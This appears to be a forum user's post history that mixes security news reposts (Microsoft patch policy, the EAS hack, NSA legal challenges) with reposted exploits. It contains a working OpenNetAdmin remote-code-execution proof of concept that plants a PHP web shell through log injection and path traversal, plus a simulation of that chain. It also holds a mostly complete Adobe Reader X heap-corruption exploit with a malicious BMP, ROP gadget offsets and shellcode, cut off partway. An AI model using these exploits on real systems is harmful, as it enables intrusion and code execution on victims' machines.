Everything posted by Matt
-
Microsoft has rolled out a new security policy which will require third-party developers to patch vulnerabilities in order to keep their software available on the company's online markets. The company said that its new policy would apply to developers offering products for the Windows Store, Azure Marketplace, Office Store and Windows Phone Store services. Under the plan, developers will have 180 days from being notified by Microsoft of a critical or important security issue.

While the severity of a security flaw varies from case to case, Microsoft generally reserves the 'critical' label for remote code execution vulnerabilities which can be exploited with little or no user notification. Flaws rated 'important' often include remote code execution, denial of service and elevation of privilege vulnerabilities. The company noted that in cases where a flaw is being actively targeted in the wild it may remove the software immediately and work with the developer to patch the vulnerability.

The policy comes alongside the July edition of the company's monthly security update. The Patch Tuesday release includes six fixes for critical vulnerabilities in Microsoft's own platforms including Internet Explorer, Windows, .NET and Silverlight. Microsoft said that two of the updates should be considered a higher priority for administrators to test and deploy. The update for the Kernel Mode Driver will address a flaw in Windows, while the Internet Explorer patch addresses a number of security issues in Microsoft's web browser.

“This continues the trend we’ve seen in recent Patch Tuesdays with Internet Explorer receiving fixes for lots of memory corruption vulnerabilities,” explained Marc Maiffret, chief technology officer at security firm BeyondTrust. “These vulnerabilities will be used in drive-by attacks where attackers set up malicious web pages and use social engineering tactics to draw users to the malicious pages. It is imperative that this patch gets rolled out as soon as possible.”

Other updates in the July release include critical fixes for Office, Visual Studio, Lync and a number of Windows components. A seventh bulletin, rated as 'important' by Microsoft, addresses an elevation of privilege error in the Microsoft Security Software package.

Source: V3.co.uk
-
To meet the growing demand from Romanian resellers, the Danish IT distributor EET EUROPARTS is now extending its activity to Romania. For more than 26 years EET Europarts has supplied European IT resellers with spare parts and accessories. Today EET Europarts is the largest European distributor of video surveillance, spare parts and accessories for computers, printers and mobile phones, with a product catalogue that also includes security solutions, home entertainment and lifestyle electronics. EET Europarts distributes many leading brands in these product segments. The EET Europarts range comprises over 300 brands and more than 400,000 products. EET Group, the parent company of all EET Europarts subsidiaries, has its corporate headquarters in Copenhagen, Denmark and operates in 21 markets in Europe and Africa.

In July 2013 EET Europarts expanded its activity by entering the Romanian market. "As part of our strategic expansion plan we have established the commercial subsidiary EET Europarts International," said John Thomas, CEO of the Copenhagen-based group. "The first step of the international division was EET Europarts' entry into Estonia, Latvia and Lithuania, a phase that has just been completed. This summer we will extend our operations to Romania and Hungary. We chose these markets on the basis of the growing demand from resellers in these countries."

EET Europarts offers resellers extremely interesting business opportunities. Besides the very wide range of products from the leading brands we represent, the company offers resellers simple working processes, superior quality of products and deliveries, and the largest stock available in Europe. The EET Group logistics centre is located near Copenhagen and ships daily to all of Europe. The high quality of deliveries is ensured by our staff specialised in logistics, as well as by video surveillance and quality control systems.

EET Europarts provides its customers with several e-commerce tools. Resellers can place orders through the webshop 24/7 and can also view prices and stock availability in real time. Electronic handling is also offered via XML, through which the customer can obtain price updates, quotations, order confirmations, invoices and delivery information. EET Group has developed a web-based Product Guide, which won the Distree EMEA award in Monaco in 2012 as "Distributor Initiative of the Year". The guide is available in 16 languages and offers a complete catalogue for more than 50,000 computers and printers, with instructions for more than 1 million related products.

"We offer resellers a superior distribution concept, and we have also understood the importance of adapting to local markets," says John Thomas, who highlights this as another key factor in EET Europarts' success. "Our employees are natives and we emphasise adapting our sales subsidiaries to the realities of the local markets." Alvaro Artero, Vice President of Sales and Business Development, will be responsible for business development in Romania. "Our objective is for EET Europarts to become the preferred partner of IT resellers in Romania as well," said Alvaro Artero. "We will offer Romanian distributors the broadest product portfolio, the best services and a personalised approach in Romanian."

About EET EUROPARTS: EET Europarts is a distributor operating in the IT, surveillance and security solutions, home entertainment and lifestyle electronics sectors. The company is the largest distributor in Europe in the segments of video surveillance, spare parts and accessories for computers, printers and mobile phones. EET Europarts represents many leading brands in these product segments. Our portfolio includes over 400,000 products and over 300 brands, among them: HP, Lexmark, IBM, Canon, Epson, Acer, Axis, Synology, IQeye, Samsung, Ernitec, Sony, Milestone, Sling Media, B&O PLAY, MicroBattery, MicroMemory, MicroLamp, MicroStorage, MicroConnect, MicroScreen, Hitachi, Western Digital, eSTUFF, Sandberg, Garmin, Jawbone, Kensington, Libratone, Loewe and many others. EET Europarts is part of EET Group, founded in 1986 and today one of the leading European distributors in the IT, security & surveillance, home entertainment and lifestyle electronics segments. EET Group has 27 sales offices in 21 countries in Europe and Africa, a total of over 400 employees, serves more than 40,000 resellers and makes more than 750,000 deliveries per year. For more information please visit EET EUROPARTS.

Source: press releases
-
https://rstforums.com/forum/70547-fsu-offensive-security-2013-curs-complet.rst
-
It's fair to say that should you see one of these warnings on your television as you're drinking your wake-up coffee, you're probably not going to have the best of days. Though, when you're told that the "bodies of the dead are rising from their graves and attacking the living," one might meet such reports, despite the official standing of such interruptions, with some skepticism.

That's exactly what happened in Montana in February, when hackers broke in to the U.S. Emergency Alert System (EAS), which interrupts television and radio broadcasts in times of local and national warnings. The default password wasn't changed, allowing the hackers to walk in to the Internet-connected appliance.

But a new security advisory warns that the EAS system is wide open to remote attacks by hackers, who can broadcast fake reports and materials. The "critical" rating from IOActive [PDF] warns that DASDEC-I and DASDEC-II application servers, made by Digital Alert Systems, are left wide open to attackers, following a recent firmware update that also disseminated the secure-shell (SSH) key. The key allows anyone with limited knowledge to log in at the root level of the server and "manipulate any system function," including browsing key directories and accessing its peering arrangement.

From the advisory, an attacker who gains control of one or more DASDEC systems "can disrupt these stations' ability to transmit and could disseminate false emergency information over a large geographic area," which in some cases could be "forwarded to and mirrored" by other systems, spreading false information over a wider area. The key is now in the public domain, and "cannot be easily removed except by a root privileged user on the server."

The security advisory warns the maker of these appliances to "re-evaluate their firmware and push updates to all appliances." Other advisories were published, including one by the U.S. CERT team, which notes that firmware version 2.0-2 resolves this vulnerability.

Source: ZDNet.com
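The practical question an operator is left with after an advisory like this is whether the vendor's shared key is authorised on their own appliance. The script below is an added example, not part of the IOActive or US-CERT advisories and not the appliance's own code: it parses an authorized_keys file (including lines with an options prefix such as from="..."), computes the same SHA256 and MD5 fingerprints that ssh-keygen -l prints, and flags any key whose fingerprint is on a blocklist. The two ed25519 keys, the sample file and the blocklist are constructed here; in practice the blocklist would hold the fingerprint published for the leaked key.

```python
import base64
import hashlib
import struct

KEY_TYPES = ("ssh-", "ecdsa-", "sk-")


def ssh_string(b):
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def ed25519_blob(raw32):
    """Public-key blob for ssh-ed25519 (the part that is base64 in authorized_keys)."""
    return ssh_string(b"ssh-ed25519") + ssh_string(raw32)


def fingerprint_sha256(blob):
    # OpenSSH's default display: base64 of SHA-256 over the blob, padding stripped
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def fingerprint_md5(blob):
    # legacy colon-separated form (ssh-keygen -l -E md5)
    h = hashlib.md5(blob).hexdigest()
    return "MD5:" + ":".join(h[i:i + 2] for i in range(0, 32, 2))


def parse_authorized_keys(text):
    """Yield (keytype, blob, comment) for each key line, tolerating an options
    prefix such as from="..." or command="..." and skipping blanks, comments
    and lines that do not decode."""
    for raw in text.splitlines():
        fields = raw.strip().split()
        if not fields or fields[0].startswith("#"):
            continue
        idx = next((i for i, f in enumerate(fields) if f.startswith(KEY_TYPES)), None)
        if idx is None or idx + 1 >= len(fields):
            continue
        try:
            blob = base64.b64decode(fields[idx + 1], validate=True)
        except ValueError:
            continue
        if len(blob) < 4:
            continue
        # the blob starts with its own type string; it must match the text field
        (tlen,) = struct.unpack(">I", blob[:4])
        if blob[4:4 + tlen].decode("ascii", "replace") != fields[idx]:
            continue
        yield fields[idx], blob, " ".join(fields[idx + 2:])


def find_blocklisted(text, blocked):
    """Return [(keytype, sha256 fingerprint, comment)] for every key whose
    SHA256 or MD5 fingerprint appears in the blocklist."""
    hits = []
    for keytype, blob, comment in parse_authorized_keys(text):
        sha, md5 = fingerprint_sha256(blob), fingerprint_md5(blob)
        if sha in blocked or md5 in blocked:
            hits.append((keytype, sha, comment))
    return hits


# Constructed sample data: two made-up ed25519 keys. LEAKED plays the role of
# the key distributed with the firmware; a real blocklist would contain the
# fingerprint published for that key, not one computed here.
LEAKED = ed25519_blob(bytes(range(32)))
LEGIT = ed25519_blob(bytes(range(32, 64)))
BLOCKLIST = {fingerprint_sha256(LEAKED)}

SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed authorized_keys",
    "ssh-ed25519 %s ops@example" % base64.b64encode(LEGIT).decode(),
    "",
    'from="10.0.0.0/8",no-pty ssh-ed25519 %s vendor-firmware'
    % base64.b64encode(LEAKED).decode(),
    "ssh-rsa not-base64!! garbage",
])


def scan_sample():
    return find_blocklisted(SAMPLE_AUTHORIZED_KEYS, BLOCKLIST)
```

The fingerprints match what `ssh-keygen -lf authorized_keys` prints for the same file, so the blocklist can be filled straight from a vendor or CERT bulletin. Note that the advisory says the key "cannot be easily removed except by a root privileged user", so a hit here means a root login on the appliance, not just an edit of a user's file.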
-
And now a ban for everyone.
-
The legal challenge is one of several launched since Snowden's leaks were reported by the Guardian and Washington Post last month.

The US supreme court will be asked to suspend the blanket collection of US telephone records by the FBI under an emergency petition due to be filed on Monday by civil rights campaigners at the Electronic Privacy Information Center (Epic). This new legal challenge to the power of government agencies to spy on Americans follows the publication last month by the Guardian of a secret order from the Foreign Intelligence Surveillance Court ordering Verizon to hand over metadata from its phone records.

Previous attempts to appeal against the rulings of these courts have floundered due to a lack of public information about who might be caught up in the surveillance net, but the disclosure of specific orders by National Security Agency whistleblower Edward Snowden has opened the door to a flurry of new challenges. It comes as a similar legal challenge was filed in Britain on Monday.

The latest from Epic asks the supreme court to rule that the NSA and FBI have stretched the law governing state intrusion to such a point that checks and balances put in by lawmakers have become meaningless. Under section 1861 of the Foreign Intelligence Surveillance Act (Fisa), authorities seeking such records from phone companies must show "that there are reasonable grounds to believe that the tangible things sought are relevant to an authorized investigation". But lawyers acting for Epic argue that the sweeping nature of Fisa court orders revealed by Snowden makes a mockery of this "relevancy" clause.

"It is simply not possible that every phone record in the possession of a telecommunications firm could be relevant to an authorized investigation," says a copy of the petition seen by the Guardian. "Such an interpretation of Section 1861 would render meaningless the qualifying phrases contained in the provision and eviscerate the purpose of the Act."

The petition seeks a "writ of mandamus" to immediately overturn the order of the lower court, presided over in secret by judge Roger Vinson, or alternatively a "writ of certiorari" to allow supreme court justices to review the decision. Epic lawyers also argue the original order is unconstitutional because it gives too much power to federal agencies, which could be abused to interfere in other areas of government. "Because the NSA sweeps up judicial and congressional communications, it inappropriately arrogates exceptional power to the executive branch," says the petition.

A number of other legal challenges have been launched since Snowden's leaks began to be reported by the Guardian and Washington Post last month. The American Civil Liberties Union filed a lawsuit with a federal court in New York which accused the US government of a process that was "akin to snatching every American's address book". It claimed the NSA's acquisition of phone records of millions of Verizon users violates the first and fourth amendments, which guarantee citizens' right to association, speech and to be free of unreasonable searches and seizures. And on Capitol Hill, a group of US senators have introduced a bill aimed at forcing the US federal government to disclose the opinions of the FISA court that determines the scope of the eavesdropping on Americans' phone records and internet communications.

Source: Guardian.co.uk
-
Besides these there is also: Default Router Passwords - PortForward.com
-
How was it handled with Filelist?
-
-
The whole question is actually "a phrase" which is actually a sentence.
-
Description: OpenNetAdmin version 13.03.01 suffers from a remote code execution vulnerability.
Author: Mandat0ry
Source: OpenNetAdmin 13.03.01 Remote Code Execution - Packet Storm
Code:

# Exploit Title: OpenNetAdmin Remote Code Execution
# Date: 03/04/13
# Exploit Author: Mandat0ry (aka Matthew Bryant)
# Vendor Homepage: http://opennetadmin.com/
# Software Link: http://opennetadmin.com/download.html
# Version: 13.03.01
# Tested on: Ubuntu
# CVE : No CVE exists - 0day exploit - probably works on the demo on their site as well! So they should be alerted.

OpenNetAdmin Remote Code Execution Exploit by Mandat0ry (aka Matthew Bryant)

Info:
This exploit works because adding modules can be done without any sort of authentication.
Modules are in this form:
module[name] = The name of the function that will be run out of the included file
module[description] = Irrelevant description of the module (unless some PHP code is injected here hmm?)
module[file] = The file to be included and then the function module[name] will be run from this included file

This exploit works by injecting some PHP code into the /var/log/ona.log file via the module description parameter. Every time a module is added to OpenNetAdmin the description/name/etc are all logged into this log file. So... By simply setting the module filepath to "../../../../../../../../../../../var/log/ona.log" (add or remove dots at will) we can include the log file as a module. Where it gets clever is remember the description is logged! So we can add PHP code into the description and thus the logs and it will be executed on inclusion of this file! The PHP interpreter will ignore everything not enclosed in PHP tags so it will only run the code we inject. This is basically a spin off of Apache log injection exploitation. Once the module has been added all you have to do is run it via "dcm.php?module=". This all works without any guest account etc.

NOTE: Because of the way the logger script works we cannot use any "=" in our injected code as it will be escaped before being added to the logs ("\=") so avoid using it!

Cool software but the code has a lot to be desired, I imagine there are a LOT more exploits than what I found but once I had RCE I was satisfied.

Proof of concept code for easy exploitation. Run this and then go to http://URLHERE/ona/dcm.php?module=mandat0ry for your shell!

<center>
<head>
<title>0wned Your Network</title>
<script type="text/javascript">
function changeaction() {
    document.sploit.action = document.getElementById("url").value;
    alert('Remember, your shell must be accessed via '+document.getElementById("url").value+'?module=mandat0ry');
}
</script>
</head>
<font size="5">OpenNetAdmin RCE Exploit</font><br />
<font size="2"><i>Now with leet button sploiting action! (oooh, ahhh!)</i></font><br /><br />
<form action="/" method="post" name="sploit" onsubmit="changeaction()" >
URL: <input id="url" value="http://127.0.0.1/ona/dcm.php" size="50" /><br />
PHP Code to Execute: <input type="text" size="50" name="options[desc]" value="<?php echo shell_exec($_GET[1]) ?>"/> <br />
<input type="hidden" name="module" value="add_module" />
<input type="hidden" name="options[name]" value="mandat0ry" />
<input type="hidden" name="options[file]" value="../../../../../../../../../../../var/log/ona.log" />
<input type="submit" value="Exploit!" />
</form>
<b><i>Special thanks to: offsec, twitches, funkenstein, zachzor, av1dmage, drc, arsinh, and the coders for OpenNetAdmin!</i></b>
</center>
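The chain above (unauthenticated add_module, description written to ona.log with "=" escaped as "\=", log path included through the module file field) modelled end to end, with the checks that break it. This is an added example in Python 3, not Mandat0ry's exploit and not OpenNetAdmin's code: the log path and the "=" escaping come from the advisory, while the web root, the modules directory, the log line format and the function names are assumptions. The target filesystem is simulated under a temp dir so the whole thing runs offline.

```python
import os
import re
import tempfile

# LOG_PATH is from the advisory; WEB_ROOT and MODULES_DIR are assumed
LOG_PATH = "/var/log/ona.log"
WEB_ROOT = "/var/www/ona"
MODULES_DIR = "/var/www/ona/modules"

# payload (no "=" in it) and traversal path exactly as the PoC form submits them
PAYLOAD = "<?php echo shell_exec($_GET[1]) ?>"
TRAVERSAL = "../../../../../../../../../../../var/log/ona.log"

PHP_TAG = re.compile(r"<\?php(.*?)\?>", re.DOTALL)


class FakeServer:
    """Hosts the target's filesystem under a temp dir so the chain runs offline."""

    def __init__(self):
        self.root = tempfile.mkdtemp()
        for d in (WEB_ROOT, MODULES_DIR, os.path.dirname(LOG_PATH)):
            os.makedirs(self.host_path(d), exist_ok=True)
        self.modules = {}

    def host_path(self, target_path):
        return os.path.join(self.root, target_path.lstrip("/"))

    def log_add_module(self, name, desc, file):
        # every add_module field lands in ona.log; the logger escapes "=" as "\="
        # (line format assumed, escaping from the advisory)
        line = "add_module name:%s desc:%s file:%s\n" % (name, desc, file)
        with open(self.host_path(LOG_PATH), "a") as fh:
            fh.write(line.replace("=", "\\="))

    def php_include(self, target_path):
        # stand-in for include(): only the <?php ... ?> segments would be executed
        with open(self.host_path(target_path)) as fh:
            return [m.group(1).strip() for m in PHP_TAG.finditer(fh.read())]


# --- vulnerable flow: no authentication, path used as supplied -----------------
def add_module_vulnerable(srv, name, desc, file):
    srv.log_add_module(name, desc, file)
    srv.modules[name] = file


def run_module_vulnerable(srv, name):
    return srv.php_include(os.path.normpath(os.path.join(WEB_ROOT, srv.modules[name])))


# --- hardened flow: auth required, name restricted, path confined ---------------
def add_module_hardened(srv, name, desc, file, authenticated=False):
    if not authenticated:
        raise PermissionError("add_module requires an authenticated admin")
    if not re.fullmatch(r"[A-Za-z0-9_]{1,32}", name):
        raise ValueError("invalid module name")
    # Canonicalise, then require the result to stay inside MODULES_DIR.
    # On a real host use os.path.realpath so symlinks are resolved as well.
    path = os.path.normpath(os.path.join(MODULES_DIR, file))
    if os.path.commonpath([path, MODULES_DIR]) != MODULES_DIR or not path.endswith(".php"):
        raise ValueError("module file outside modules directory: %s" % path)
    srv.log_add_module(name, desc, path)
    srv.modules[name] = path


def exploit_vulnerable():
    """Returns the PHP the server would execute: the injected shell."""
    srv = FakeServer()
    add_module_vulnerable(srv, "mandat0ry", PAYLOAD, TRAVERSAL)
    return run_module_vulnerable(srv, "mandat0ry")


def exploit_with_equals():
    """Why the post says to avoid "=": it reaches the log as "\\=" and breaks the PHP."""
    srv = FakeServer()
    add_module_vulnerable(srv, "m", "<?php $c=1; system($c); ?>", TRAVERSAL)
    return run_module_vulnerable(srv, "m")


def exploit_hardened():
    srv = FakeServer()
    try:
        add_module_hardened(srv, "mandat0ry", PAYLOAD, TRAVERSAL, authenticated=True)
    except ValueError as err:
        return str(err)
    return "accepted"


def hardened_rejects_unauthenticated():
    try:
        add_module_hardened(FakeServer(), "dns", "DNS helper", "dns.php")
    except PermissionError:
        return True
    return False


def hardened_accepts_legit():
    srv = FakeServer()
    add_module_hardened(srv, "dns", "DNS helper", "dns.php", authenticated=True)
    return srv.modules["dns"]
```

The path check is the part that actually kills the bug: once include() can only reach files under the modules directory, poisoning the log is harmless, and the authentication check removes the unauthenticated entry point the advisory leads with. Escaping "=" in the logger, which is what the PoC has to work around, is not a defence at all.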
-
Description: Adobe Reader X version 10.1.4.38 suffers from a BMP/RLE heap corruption vulnerability.
Author: feliam
Source: Adobe Reader X 10.1.4.38 BMP/RLE Heap Corruption - Packet Storm
Code:

'''
Title: Adobe Reader X BMP/RLE heap corruption
Product: Adobe Reader X
Version: 10.x
Product Homepage: adobe.com
Binary affected: AcroForm.api
Binary Version: 10.1.4.38
Binary MD5: 8e0fc0c6f206b84e265cc3076c4b9841

Configuration Requirements
-----------------------------------------
Default configuration.

Vulnerability Requirements
-----------------------------------------
None.

Vulnerability Description
-----------------------------------------
Adobe Reader X fails to validate the input when parsing an embedded BMP RLE
encoded image. Arbitrary code execution in the context of the sandboxed
process is proved possible after a malicious embedded bmp image triggers a
heap overflow.

Vulnerability WorkAround (if possible)
-----------------------------------------
Delete AcroForm.api
'''
# Python 2 script: byte strings and integer division are relied on throughout.
from hashlib import md5
import sys, struct

######### Begin of the miniPDF
import zlib

# For constructing a minimal pdf file
## PDF REference 3rd edition:: 3.2 Objects
class PDFObject:
    def __init__(self):
        self.n = None
        self.v = None

    def __str__(self):
        raise Exception("Fail")

## PDF REference 3rd edition:: 3.2.1 Booleans Objects
class PDFBool(PDFObject):
    def __init__(self, s):
        PDFObject.__init__(self)
        self.s = s

    def __str__(self):
        if self.s:
            return "true"
        return "false"

## PDF REference 3rd edition:: 3.2.2 Numeric Objects
class PDFNum(PDFObject):
    def __init__(self, s):
        PDFObject.__init__(self)
        self.s = s

    def __str__(self):
        return "%s" % self.s

## PDF REference 3rd edition:: 3.2.3 String Objects
class PDFString(PDFObject):
    def __init__(self, s):
        PDFObject.__init__(self)
        self.s = s

    def __str__(self):
        return "(%s)" % self.s

## PDF REference 3rd edition:: 3.2.3 String Objects / Hexadecimal Strings
class PDFHexString(PDFObject):
    def __init__(self, s):
        PDFObject.__init__(self)
        self.s = s

    def __str__(self):
        return "<" + "".join(["%02x" % ord(c) for c in self.s]) + ">"

## A convenient type of literal Strings
class PDFOctalString(PDFObject):
    def __init__(self, s):
        PDFObject.__init__(self)
        self.s = "".join(["\\%03o" % ord(c) for c in s])

    def __str__(self):
        return "(%s)" % self.s

## PDF REference 3rd edition:: 3.2.4 Name Objects
class PDFName(PDFObject):
    def __init__(self, s):
        PDFObject.__init__(self)
        self.s = s

    def __str__(self):
        return "/%s" % self.s

## PDF REference 3rd edition:: 3.2.5 Array Objects
class PDFArray(PDFObject):
    def __init__(self, s):
        PDFObject.__init__(self)
        assert type(s) == type([])
        self.s = s

    def append(self, o):
        self.s.append(o)
        return self

    def __str__(self):
        return "[%s]" % (" ".join([o.__str__() for o in self.s]))

## PDF REference 3rd edition:: 3.2.6 Dictionary Objects
class PDFDict(PDFObject):
    def __init__(self, d={}):
        PDFObject.__init__(self)
        self.dict = {}
        for k in d:
            self.dict[k] = d[k]

    def __iter__(self):
        for k in self.dict.keys():
            yield k

    def __iterkeys__(self):
        for k in self.dict.keys():
            yield k

    def __getitem__(self, key):
        return self.dict[key]

    def add(self, name, obj):
        self.dict[name] = obj

    def get(self, name):
        if name in self.dict.keys():
            return self.dict[name]
        else:
            return None

    def __str__(self):
        s = "<<"
        for name in self.dict:
            s += "%s %s " % (PDFName(name), self.dict[name])
        s += ">>"
        return s

## PDF REference 3rd edition:: 3.2.7 Stream Objects
class PDFStream(PDFDict):
    def __init__(self, d={}, stream=""):
        PDFDict.__init__(self, d)
        self.stream = stream
        self.filtered = self.stream
        self.add('Length', len(stream))
        self.filters = []

    def appendFilter(self, filter):
        self.filters.append(filter)
        self._applyFilters()  # yeah every time .. so what!

    def _applyFilters(self):
        self.filtered = self.stream
        for f in self.filters:
            self.filtered = f.encode(self.filtered)
        if len(self.filters) > 0:
            self.add('Length', len(self.filtered))
            self.add('Filter', PDFArray([f.name for f in self.filters]))
        # Add Filter parameters ?

    def __str__(self):
        self._applyFilters()  # yeah every time .. so what!
        s = ""
        s += PDFDict.__str__(self)
        s += "\nstream\n"
        s += self.filtered
        s += "\nendstream"
        return s

## PDF REference 3rd edition:: 3.2.8 Null Object
class PDFNull(PDFObject):
    def __init__(self):
        PDFObject.__init__(self)

    def __str__(self):
        return "null"

## PDF REference 3rd edition:: 3.2.9 Indirect Objects
class UnResolved(PDFObject):
    def __init__(self, n, v):
        PDFObject.__init__(self)
        self.n = n
        self.v = v

    def __str__(self):
        return "UNRESOLVED(%d %d)" % (self.n, self.v)

class PDFRef(PDFObject):
    def __init__(self, obj):
        PDFObject.__init__(self)
        self.obj = [obj]

    def __str__(self):
        if len(self.obj) == 0:
            return "null"
        return "%d %d R" % (self.obj[0].n, self.obj[0].v)

## PDF REference 3rd edition:: 3.3 Filters
## Example Filter...
class FlateDecode:
    name = PDFName('FlateDecode')

    def __init__(self):
        pass

    def encode(self, stream):
        return zlib.compress(stream)

    def decode(self, stream):
        return zlib.decompress(stream)

## PDF REference 3rd edition:: 3.4 File Structure
## Simplest file structure...
class PDFDoc():
    def __init__(self, obfuscate=0):
        self.objs = []
        self.info = None
        self.root = None

    def setRoot(self, root):
        self.root = root

    def setInfo(self, info):
        self.info = info

    def _add(self, obj):
        if obj.v != None or obj.n != None:
            raise Exception("Already added!!!")
        obj.v = 0
        obj.n = 1 + len(self.objs)
        self.objs.append(obj)

    def add(self, obj):
        if type(obj) != type([]):
            self._add(obj)
        else:
            for o in obj:
                self._add(o)

    def _header(self):
        return "%PDF-1.5\n%\xE7\xF3\xCF\xD3\n"

    def __str__(self):
        doc1 = self._header()
        xref = {}
        for obj in self.objs:
            xref[obj.n] = len(doc1)
            doc1 += "%d %d obj\n" % (obj.n, obj.v)
            doc1 += obj.__str__()
            doc1 += "\nendobj\n"
        posxref = len(doc1)
        doc1 += "xref\n"
        doc1 += "0 %d\n" % (len(self.objs) + 1)
        doc1 += "0000000000 65535 f \n"
        for xr in xref.keys():
            doc1 += "%010d %05d n \n" % (xref[xr], 0)
        doc1 += "trailer\n"
        trailer = PDFDict()
        trailer.add("Size", len(self.objs) + 1)
        if self.root == None:
            raise Exception("Root not set!")
        trailer.add("Root", PDFRef(self.root))
        if self.info:
            trailer.add("Info", PDFRef(self.info))
        doc1 += trailer.__str__()
        doc1 += "\nstartxref\n%d\n" % posxref
        doc1 += "%%EOF"
        return doc1
######### End of miniPDF

SLIDESIZE = 0x12C

def mkBMP(payload, exception=True):
    bmp = ''
    # getInfoHeader
    bfType = 0x4d42
    assert bfType in [0x4d42, 0x4349, 0x5043, 0x4943, 0x5043]  # 0x4142: not supp
    bmp += struct.pack('<H', bfType)
    bfSize = 0
    bfOffBits = 0
    bmp += struct.pack('<L', bfSize)
    bmp += struct.pack('<H', 0)  # Reserved1
    bmp += struct.pack('<H', 0)  # Reserved2
    bmp += struct.pack('<L', bfOffBits)

    biSize = 0x40
    assert not biSize in [0x12]
    bmp += struct.pack('<L', biSize)
    biHeight = 1
    biWidth = SLIDESIZE  # size of texture structure LFH enabled
    biPlanes = 1
    biBitCount = 8
    biCompression = 1
    biSizeImage = 0
    biXPelsPerMeter = 0
    biYPelsPerMeter = 0
    biClrUsed = 2
    if biClrUsed > 0xff:
        raise "BUG!!!!"
    biClrImportant = 0
    bmp += struct.pack('<L', biWidth)
    bmp += struct.pack('<L', biHeight)
    bmp += struct.pack('<H', biPlanes)
    bmp += struct.pack('<H', biBitCount)
    bmp += struct.pack('<L', biCompression)
    bmp += struct.pack('<L', biSizeImage)
    bmp += struct.pack('<L', biXPelsPerMeter)
    bmp += struct.pack('<L', biYPelsPerMeter)
    bmp += struct.pack('<L', biClrUsed)
    bmp += struct.pack('<L', biClrImportant)
    bmp += 'A' * (biSize - 0x40)  # pad

    numColors = biClrUsed
    if biClrUsed == 0 or biBitCount < 8:
        numColors = 1 << biBitCount
    bmp += 'RGBA' * (numColors)  # pallete

    bmp += '\x00\x02\xff\x00' * ((0xffffffff - 0xff) / 0xff)
    # while (len(bmp)+10)%0x400 != 0:
    #     bmp += '\x00\x02\x00\x00'

    assert len(payload) < 0x100 and len(payload) >= 3
    bmp += '\x00\x02' + chr(0x100 - len(payload)) + '\x00'
    bmp += '\x00' + chr(len(payload)) + payload
    if len(payload) & 1:
        bmp += 'P'

    if exception:
        bmp += '\x00\x02\x00\xff' * 10  # getting the pointer outside the texture so it triggers an exception
        bmp += '\x00' + chr(10) + 'X' * 10
    else:
        bmp += '\x00\x01'
    # '\x04X'*(biWidth+2000)+"\x00\x02"
    return bmp

def UEncode(s):
    r = ''
    s += '\x00' * (len(s) % 2)
    for i in range(0, len(s), 2):
        r += '\\u%04x' % (struct.unpack('<H', (s[i:i + 2]))[0])
    return r
    r = ''
    for c in s:
        r += '%%%02x' % ord(c)
    return r

def mkXFAPDF(shellcode='\x90' * 0x400 + '\xcc'):
    xdp = '''
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" timeStamp="2012-11-23T13:41:54Z" uuid="0aa46f9b-2c50-42d4-ab0b-1a1015321da7">
  <template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/" xmlns="http://www.xfa.org/schema/xfa-template/3.0/">
    <?formServer defaultPDFRenderFormat acrobat9.1static?>
    <?formServer allowRenderCaching 0?>
    <?formServer formModel both?>
    <subform name="form1" layout="tb" locale="en_US" restoreState="auto">
      <pageSet>
        <pageArea name="Page1" id="Page1">
          <contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/>
          <medium stock="default" short="612pt" long="792pt"/>
          <?templateDesigner expand 1?>
        </pageArea>
        <?templateDesigner expand 1?>
      </pageSet>
      <variables>
        <script name="util" contentType="application/x-javascript">
          // Convenience functions to pack and unpack litle endian an utf-16 strings
          function pack(i){
              var low = (i & 0xffff);
              var high = ((i>>16) & 0xffff);
              return String.fromCharCode(low)+String.fromCharCode(high);
          }
          function unpackAt(s, pos){
              return s.charCodeAt(pos) + (s.charCodeAt(pos+1)<<16);
          }
          function packs(s){
              result = "";
              for (i=0;i<s.length;i+=2)
                  result += String.fromCharCode(s.charCodeAt(i) + (s.charCodeAt(i+1)<<8));
              return result;
          }
          function packh(s){
              return String.fromCharCode(parseInt(s.slice(2,4)+s.slice(0,2),16));
          }
          function packhs(s){
              result = "";
              for (i=0;i<s.length;i+=4)
                  result += packh(s.slice(i,i+4));
              return result;
          }
          var verbose = 1;
          function message(x){
              if (util.verbose == 1 )
                  xfa.host.messageBox(x);
          }
          //ROP0
          //7201E63D XCHG EAX,ESP
          //7201E63E RETN
          //ROP1
          //7200100A JMP DWORD PTR DS:[KERNEL32.GetModuleHandle]
          //ROP2
          //7238EF5C PUSH EAX
          //7238EF5D CALL DWORD PTR DS:[KERNEL32.GetProcAddress]
          //7238EF63 TEST EAX,EAX
          //7238EF65 JNE SHORT 7238EF84
          //7238EF84 POP EBP
          //7238EF85 RETN 4
          //ROP3
          //72001186 JMP EAX ; kernel32.VirtualProtect
          //ROP4
          //72242491 ADD ESP,70
          //72242494 RETN
          var _offsets = {
              "Reader": {
                  "10.104": {
                      "acrord32": 0xA4,
                      "rop0": 0x1E63D,
                      "rop1": 0x100A,
                      "rop2": 0x38EF5C,
                      "rop3": 0x1186,
                      "rop4": 0x242491,
                  },
                  "10.105": { // Added by Eddie Mitchell
                      "acrord32": 0xA5,
                      "rop0": 0x1E52D,
                      "rop1": 0x100A,
                      "rop2": 0x393526,
                      "rop3": 0x1186,
                      "rop4": 0x245E71,
                  },
                  "10.106": { // Added by Eddie Mitchell
                      "acrord32": 0xA5,
                      "rop0": 0x1E52D,
                      "rop1": 0x100A,
                      "rop2": 0x393526,
                      "rop3": 0x1186,
                      "rop4": 0x245E71,
                  },
              },
              "Exchange-Pro": {
                  "10.105": { // Added by Eddie Mitchell
                      "acrobat": 0xCD,
                      "rop0": 0x3720D,
                      "rop1": 0x100A,
                      "rop2": 0x3DCC91,
                      "rop3": 0x180F,
                      "rop4": 0x25F2A1,
                  },
              },
          };
          function offset(x){
              //app.viewerType will be "Reader" for Reader,
              //"Exchange" for Acrobat Standard or "Exchange-Pro" for Acrobat Pro
              try {
                  return _offsets[app.viewerType][app.viewerVersion][x];
              } catch (e) {
                  xfa.host.messageBox("Type:" +app.viewerType+ " Version: "+app.viewerVersion+" NOT SUPPORTED!");
              }
              return 0x41414141;
          }
        </script>
        <script name="spray" contentType="application/x-javascript">
          // Global variable for spraying
